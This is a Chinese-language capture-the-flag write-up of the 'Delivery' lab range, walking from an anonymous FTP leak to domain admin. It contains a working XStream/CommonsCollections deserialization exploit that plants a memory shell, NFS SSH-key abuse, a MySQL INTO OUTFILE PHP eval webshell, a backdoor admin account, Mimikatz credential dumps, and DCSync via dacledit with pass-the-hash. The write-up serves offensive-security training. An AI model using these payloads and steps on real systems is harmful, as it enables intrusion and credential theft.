靶标介绍:
在这个靶场中,您将扮演一名渗透测试工程师,受雇于一家名为 Delivery 的小型科技初创公司,并对该公司进行一次渗透测试。你的目标是成功获取域控制器权限,以评估公司的网络安全状况。该靶场共有 4 个 Flag,分布于不同的靶机。
FLAG1
关卡剧情:
请测试 Delivery 暴露在公网上的 Web 应用的安全性,并尝试获取在该服务器上执行任意命令的能力。
信息收集
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
39.99.253.50:8080 open
39.99.253.50:21 open
39.99.253.50:22 open
39.99.253.50:80 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle http://39.99.253.50 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works
[+] ftp 39.99.253.50:21:anonymous
[->]1.txt
[->]pom.xml
[*] WebTitle http://39.99.253.50:8080 code:200 len:3655 title:公司发货单
看到未授权ftp
里面有一个pom.xml,看起来是一个经典的xstream反序列化漏洞
1<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
2<modelVersion>4.0.0</modelVersion>
3<parent>
4<groupId>org.springframework.boot</groupId>
5<artifactId>spring-boot-starter-parent</artifactId>
6<version>2.7.2</version>
7<relativePath/>
8<!-- lookup parent from repository -->
9</parent>
10<groupId>com.example</groupId>
11<artifactId>ezjava</artifactId>
12<version>0.0.1-SNAPSHOT</version>
13<name>ezjava</name>
14<description>ezjava</description>
15<properties>
16<java.version>1.8</java.version>
17</properties>
18<dependencies>
19<dependency>
20<groupId>org.springframework.boot</groupId>
21<artifactId>spring-boot-starter-thymeleaf</artifactId>
22</dependency>
23<dependency>
24<groupId>org.springframework.boot</groupId>
25<artifactId>spring-boot-starter-web</artifactId>
26</dependency>
27<dependency>
28<groupId>org.springframework.boot</groupId>
29<artifactId>spring-boot-starter-test</artifactId>
30<scope>test</scope>
31</dependency>
32<dependency>
33<groupId>com.thoughtworks.xstream</groupId>
34<artifactId>xstream</artifactId>
35<version>1.4.16</version>
36</dependency>
37<dependency>
38<groupId>commons-collections</groupId>
39<artifactId>commons-collections</artifactId>
40<version>3.2.1</version>
41</dependency>
42</dependencies>
43<build>
44<plugins>
45<plugin>
46<groupId>org.springframework.boot</groupId>
47<artifactId>spring-boot-maven-plugin</artifactId>
48</plugin>
49</plugins>
50</build>
51</project>
在8080端口能看到一个表单服务,这不就对上了吗
直接cc3打冰蝎内存马即可
1import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
2import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
3import com.thoughtworks.xstream.XStream;
4import org.apache.commons.collections.Transformer;
5import org.apache.commons.collections.functors.ChainedTransformer;
6import org.apache.commons.collections.functors.ConstantTransformer;
7import org.apache.commons.collections.functors.InvokerTransformer;
8import org.apache.commons.collections.keyvalue.TiedMapEntry;
9import org.apache.commons.collections.map.LazyMap;
10
11import javax.xml.transform.TransformerConfigurationException;
12import java.io.*;
13import java.lang.reflect.Field;
14import java.nio.file.Files;
15import java.nio.file.Paths;
16import java.util.Base64;
17import java.util.HashMap;
18import java.util.HashSet;
19import java.util.Map;
20
21public class Main {
22 public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, TransformerConfigurationException, ClassNotFoundException {
23
24 TemplatesImpl templates = new TemplatesImpl();
25
26 // _name 不为空 _bytecodes传入恶意类 测试阶段 _tfactory要手动实例化TransformerFactoryImpl对象
27 Class c = templates.getClass();
28 Field nameField = c.getDeclaredField("_name");
29 nameField.setAccessible(true);
30 nameField.set(templates,"xrntkk");
31
32 Field bytecodesField = c.getDeclaredField("_bytecodes");
33 bytecodesField.setAccessible(true);
34 byte[] bytecodes = Base64.getDecoder().decode("内存马");
35 byte[][] shellCode = {bytecodes};
36 bytecodesField.set(templates,shellCode);
37
38//
39// Field tfactoryField = c.getDeclaredField("_tfactory");
40// tfactoryField.setAccessible(true);
41// tfactoryField.set(templates,new TransformerFactoryImpl());
42
43 Transformer[] transformers_test = new Transformer[]{};
44 Transformer[] transformers = new Transformer[]{
45 new ConstantTransformer(templates),
46 new InvokerTransformer("newTransformer",null,null)
47 };
48 ChainedTransformer chainedTransformer = new ChainedTransformer(transformers_test);
49
50 Map lazyMap = LazyMap.decorate(new HashMap<>(), chainedTransformer);
51
52 TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, "123");
53
54 HashSet<Object> hashSet = new HashSet<>();
55 hashSet.add(tiedMapEntry);
56
57 lazyMap.remove("123");
58
59 Class lazyClass = Class.forName("org.apache.commons.collections.map.LazyMap");
60 Field lzField = lazyClass.getDeclaredField("factory");
61 lzField.setAccessible(true);
62 lzField.set(lazyMap,new ChainedTransformer(transformers));
63
64
65// serialize(hashSet);
66// unserialize();
67 XStream xStream = new XStream();
68 String xml = xStream.toXML(hashSet);
69 System.out.println(xml);
70 }
71 public static void serialize(Object o) throws IOException {
72 ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
73 oos.writeObject(o);
74 }
75
76 public static Object unserialize() throws IOException, ClassNotFoundException {
77 ObjectInputStream ois = new ObjectInputStream(new FileInputStream("ser.bin"));
78 Object o = ois.readObject();
79 return o;
80 }
81}
root目录拿到flag
root@ubuntu:/usr/bin# cat /root/flag/flag01.txt
██████ ██ ██ ██ ██
██░░░░██ █████ ░██ ░██ ░██ ░░
██ ░░ ██████ ███████ ██░░░██ ██████ ██████ ██████ ██ ██ ░██ ██████ ██████ ██ ██████ ███████ ██████
░██ ██░░░░██░░██░░░██░██ ░██░░██░░█ ░░░░░░██ ░░░██░ ░██ ░██ ░██ ░░░░░░██ ░░░██░ ░██ ██░░░░██░░██░░░██ ██░░░░
░██ ░██ ░██ ░██ ░██░░██████ ░██ ░ ███████ ░██ ░██ ░██ ░██ ███████ ░██ ░██░██ ░██ ░██ ░██░░█████
░░██ ██░██ ░██ ░██ ░██ ░░░░░██ ░██ ██░░░░██ ░██ ░██ ░██ ░██ ██░░░░██ ░██ ░██░██ ░██ ░██ ░██ ░░░░░██
░░██████ ░░██████ ███ ░██ █████ ░███ ░░████████ ░░██ ░░██████ ███░░████████ ░░██ ░██░░██████ ███ ░██ ██████
░░░░░░ ░░░░░░ ░░░ ░░ ░░░░░ ░░░ ░░░░░░░░ ░░ ░░░░░░ ░░░ ░░░░░░░░ ░░ ░░ ░░░░░░ ░░░ ░░ ░░░░░░
flag01: flag{b1bd4b09-1eb2-4cbc-8349-a9a76eeff680}
FLAG2
关卡剧情:
为了实现跨机器和跨操作系统的文件共享,管理员在内网部署了 NFS,然而这个决策却使得该服务器陷入了潜在的安全风险。你的任务是尝试获取该服务器的控制权,以评估安全性。
信息收集
1root@ubuntu:/tmp# ifconfig
2eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
3 inet 172.22.13.14 netmask 255.255.0.0 broadcast 172.22.255.255
4 inet6 fe80::216:3eff:fe2a:6741 prefixlen 64 scopeid 0x20<link>
5 ether 00:16:3e:2a:67:41 txqueuelen 1000 (Ethernet)
6 RX packets 146856 bytes 196011094 (196.0 MB)
7 RX errors 0 dropped 0 overruns 0 frame 0
8 TX packets 39307 bytes 14862712 (14.8 MB)
9 TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
10
11lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
12 inet 127.0.0.1 netmask 255.0.0.0
13 inet6 ::1 prefixlen 128 scopeid 0x10<host>
14 loop txqueuelen 1000 (Local Loopback)
15 RX packets 1358 bytes 125704 (125.7 KB)
16 RX errors 0 dropped 0 overruns 0 frame 0
17 TX packets 1358 bytes 125704 (125.7 KB)
18 TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
1root@ubuntu:/# ./fscan -h 172.22.13.0/24
2
3 ___ _
4 / _ \ ___ ___ _ __ __ _ ___| | __
5 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
6/ /_\\_____\__ \ (__| | | (_| | (__| <
7\____/ |___/\___|_| \__,_|\___|_|\_\
8 fscan version: 1.8.4
9start infoscan
10(icmp) Target 172.22.13.14 is alive
11(icmp) Target 172.22.13.6 is alive
12(icmp) Target 172.22.13.28 is alive
13(icmp) Target 172.22.13.57 is alive
14[*] Icmp alive hosts len is: 4
15172.22.13.57:80 open
16172.22.13.14:21 open
17172.22.13.28:80 open
18172.22.13.57:22 open
19172.22.13.14:80 open
20172.22.13.14:22 open
21172.22.13.14:8080 open
22172.22.13.28:8000 open
23172.22.13.28:3306 open
24172.22.13.6:445 open
25172.22.13.28:445 open
26172.22.13.6:139 open
27172.22.13.28:139 open
28172.22.13.6:88 open
29172.22.13.28:135 open
30172.22.13.6:135 open
31172.22.13.14:9999 open
32[*] alive ports len is: 17
33start vulscan
34[*] NetInfo
35[*]172.22.13.6
36 [->]WIN-DC
37 [->]172.22.13.6
38[*] NetInfo
39[*]172.22.13.28
40 [->]WIN-HAUWOLAO
41 [->]172.22.13.28
42[*] WebTitle http://172.22.13.57 code:200 len:4833 title:Welcome to CentOS
43[*] NetBios 172.22.13.28 WIN-HAUWOLAO.xiaorang.lab Windows Server 2016 Datacenter 14393
44[+] ftp 172.22.13.14:21:anonymous
45 [->]1.txt
46 [->]pom.xml
47[*] WebTitle http://172.22.13.14 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works
48[*] WebTitle http://172.22.13.28 code:200 len:2525 title:欢迎登录OA办公平台
49[*] NetBios 172.22.13.6 [+] DC:XIAORANG\WIN-DC
50[*] WebTitle http://172.22.13.14:8080 code:200 len:3655 title:公司发货单
51[*] WebTitle http://172.22.13.28:8000 code:200 len:170 title:Nothing Here.
52[+] mysql 172.22.13.28:3306:root 123456
53已完成 17/17
54[*] 扫描结束,耗时: 17.106463505s
扫到另外三台机器
1[2026-03-09 20:08:47] [SUCCESS] 目标 172.22.13.14 存活 (ICMP) //入口机
2[2026-03-09 20:08:47] [SUCCESS] 目标 172.22.13.6 存活 (ICMP) //DC
3[2026-03-09 20:08:47] [SUCCESS] 目标 172.22.13.28 存活 (ICMP) //WINDOWS
4[2026-03-09 20:08:47] [SUCCESS] 目标 172.22.13.57 存活 (ICMP) //CentOS
根据题目描述,我们先通过rpcinfo命令来确定主机上是否运行或挂载了NFS服务
┌──(root㉿XrntkkDesktop)-[/home/xrntkk]
└─# proxychains4 -q rpcinfo -p 172.22.13.57
program vers proto port service
100000 4 tcp 111 portmapper
100000 3 tcp 111 portmapper
100000 2 tcp 111 portmapper
100000 4 udp 111 portmapper
100000 3 udp 111 portmapper
100000 2 udp 111 portmapper
100005 1 udp 20048 mountd
100005 1 tcp 20048 mountd
100005 2 udp 20048 mountd
100005 2 tcp 20048 mountd
100005 3 udp 20048 mountd
100005 3 tcp 20048 mountd
100024 1 udp 58037 status
100024 1 tcp 39962 status
100003 3 tcp 2049 nfs
100003 4 tcp 2049 nfs
100227 3 tcp 2049 nfs_acl
100003 3 udp 2049 nfs
100003 4 udp 2049 nfs
100227 3 udp 2049 nfs_acl
100021 1 udp 58230 nlockmgr
100021 3 udp 58230 nlockmgr
100021 4 udp 58230 nlockmgr
100021 1 tcp 41894 nlockmgr
100021 3 tcp 41894 nlockmgr
100021 4 tcp 41894 nlockmgr
查看可用的nfs共享,可以看到共享了/home/joyce目录
┌──(root㉿XrntkkDesktop)-[/home/xrntkk]
└─# proxychains4 -q showmount -e 172.22.13.57
Export list for 172.22.13.57:
/home/joyce *
挂载一手到入口机上
root@ubuntu:/# mkdir mount1
root@ubuntu:/# mount -t nfs 172.22.13.57:/home/joyce /mount1
目录是空的,直接写ssh key,用ssh连上去
root@ubuntu:/mount1# rm -rf .ssh/
root@ubuntu:/mount1# mkdir .ssh
root@ubuntu:/mount1# ssh-keygen -t rsa -b 4096
root@ubuntu:/mount1# cat /root/.ssh/id_rsa.pub >> /mount1/.ssh/authorized_keys
root@ubuntu:/mount1# ssh joyce@172.22.13.57
Last login: Thu Aug 11 18:16:01 2022
Welcome to Alibaba Cloud Elastic Compute Service !
[joyce@centos ~]$
suid提权
[joyce@centos ~]$ find / -perm -u=s -type f 2>/dev/null
/usr/libexec/dbus-1/dbus-daemon-launch-helper
/usr/sbin/unix_chkpwd
/usr/sbin/pam_timestamp_check
/usr/sbin/usernetctl
/usr/sbin/mount.nfs
/usr/bin/sudo
/usr/bin/chage
/usr/bin/at
/usr/bin/mount
/usr/bin/crontab
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/su
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/ftp
/usr/bin/umount
有两种打法,一种是nfs提权,参考:Linux提权基础分享和讨论-先知社区,另一种是通过ftp把文件带出去,像这样
root@ubuntu:/mount1# python3 -m pyftpdlib -p 4400 -u xrntkk -P xrntkk -w
[I 2026-03-09 21:20:53] concurrency model: async
[I 2026-03-09 21:20:53] masquerade (NAT) address: None
[I 2026-03-09 21:20:53] passive ports: None
[I 2026-03-09 21:20:53] >>> starting FTP server on 0.0.0.0:4400, pid=5235 <<<
在入口机开启ftp服务,利用ftp中的put命令带出文件
[joyce@centos CVE-2021-4034-main]$ ftp 172.22.13.14 4400
Connected to 172.22.13.14 (172.22.13.14).
220 pyftpdlib 1.5.6 ready.
Name (172.22.13.14:joyce): xrntkk
331 Username ok, send password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put /flag02.txt
local: /flag02.txt remote: /flag02.txt
227 Entering passive mode (172,22,13,14,214,225).
125 Data connection already open. Transfer starting.
226 Transfer complete.
466 bytes sent in 1.5e-05 secs (31066.67 Kbytes/sec)
ftp>
拿到flag02
[joyce@centos CVE-2021-4034-main]$ cat flag02.txt
SSS h d CCC d t l
S h d C d t ii l
SSS hhh aa ddd ooo w w C rrr eee ddd eee nnn ttt aa l ss
S h h a a d d o o w w w C r e e d d e e n n t ii a a l s
SSSS h h aaa ddd ooo w w CCC r ee ddd ee n n tt ii aaa l ss
flag02: flag{190fe837-c783-4b6a-ba00-ac5c64fe58c6}
hint: relay race
FLAG3
关卡剧情:
由于域管理员错误的配置,导致域内某个用户拥有危险的 DACL。你的任务是找到该用户,并评估这个配置错误所带来的潜在危害。
mysql弱口令
[+] mysql 172.22.13.28:3306:root 123456
secure_file_priv为空,可以写webshell
看到用的是phpstudy起的服务
直接写入webshell
select "<?php eval($_POST[1]);?>" into outfile "C:/phpstudy_pro/WWW/1.php";
直接加用户rdp上去
C:\phpstudy_pro\WWW> net user xrntkk Abc123456 /add
命令成功完成。
C:\phpstudy_pro\WWW> net localgroup administrators xrntkk /add
命令成功完成。
拿到flag03
FLAG4
靶标介绍:
在这个靶场中,您将扮演一名渗透测试工程师,受雇于一家名为 Delivery 的小型科技初创公司,并对该公司进行一次渗透测试。你的目标是成功获取域控制器权限,以评估公司的网络安全状况。该靶场共有 4 个 Flag,分布于不同的靶机
先用mimikatz抓一波hash,拿到了chenlei的密码
Authentication Id : 0 ; 90614 (00000000:000161f6)
Session : Service from 0
User Name : chenglei
Domain : XIAORANG
Logon Server : WIN-DC
Logon Time : 2026/3/9 19:27:29
SID : S-1-5-21-3269458654-3569381900-10559451-1105
msv :
[00000003] Primary
* Username : chenglei
* Domain : XIAORANG
* NTLM : 0c00801c30594a1b8eaa889d237c5382
* SHA1 : e8848f8a454e08957ec9814b9709129b7101fad7
* DPAPI : 89b179dc738db098372c365602b7b0f4
tspkg :
wdigest :
* Username : chenglei
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : chenglei
* Domain : XIAORANG.LAB
* Password : Xt61f3LBhg1
ssp :
credman :
这是一个域用户,rdp上去之后做一波域内的信息收集
proxychains4 xfreerdp3 /v:172.22.13.28 /u:chenglei /p:Xt61f3LBhg1
可以看到chenlei对DC有WriteDacl权限
WriteDACL权限可以修改域对象的ACL,最终实现利用DCSync导出域内所有用户hash
使用dacledit给chenglei添加DCSync 权限
proxychains4 -q python3 dacledit.py xiaorang.lab/chenglei:'Xt61f3LBhg1' -action write -rights DCSync -principal chenglei -target-dn 'DC=xiaorang,DC=lab' -dc-ip 172.22.13.6
接下来就可以直接打DCSync dump域控哈希了,直接用mimikatz
C:\Users\chenglei\Downloads>mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # lsadump::dcsync /domain:xiaorang.lab /all /csv
[DC] 'xiaorang.lab' will be the domain
[DC] 'WIN-DC.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
1104 zhangwen fa7d776fdfc82d3f43c9d8b7f5312d77 512
502 krbtgt cb976ec1a1bf8a14a15142c6fecc540e 514
1106 zhangtao e786c4a4987ced162c496d0519496729 512
1000 WIN-DC$ c724ec902e48135423b92df651198712 532480
500 Administrator 6341235defdaed66fb7b682665752c9a 512
1105 chenglei 0c00801c30594a1b8eaa889d237c5382 512
1103 WIN-HAUWOLAO$ 3d35e38416645854338db6b1c4b32f59 4096
mimikatz(commandline) # exit
Bye!
或者使用impacket-secretsdump
proxychains4 -q impacket-secretsdump xiaorang.lab/chenglei:Xt61f3LBhg1@172.22.13.28 -target-ip 172.22.13.6 -just-dc-ntlm
接着就可以横向拿flag了
proxychains4 -q impacket-smbexec -hashes :6341235defdaed66fb7b682665752c9a administrator@172.22.13.6 -codec gbk
这题还有另一种打法就是通过WriteDACL打RBCD,可以参考Aoselu靶场的打法
参考文章:
https://www.s1mh0.cn/blog/index.php/2025/04/14/cqyj_delivery/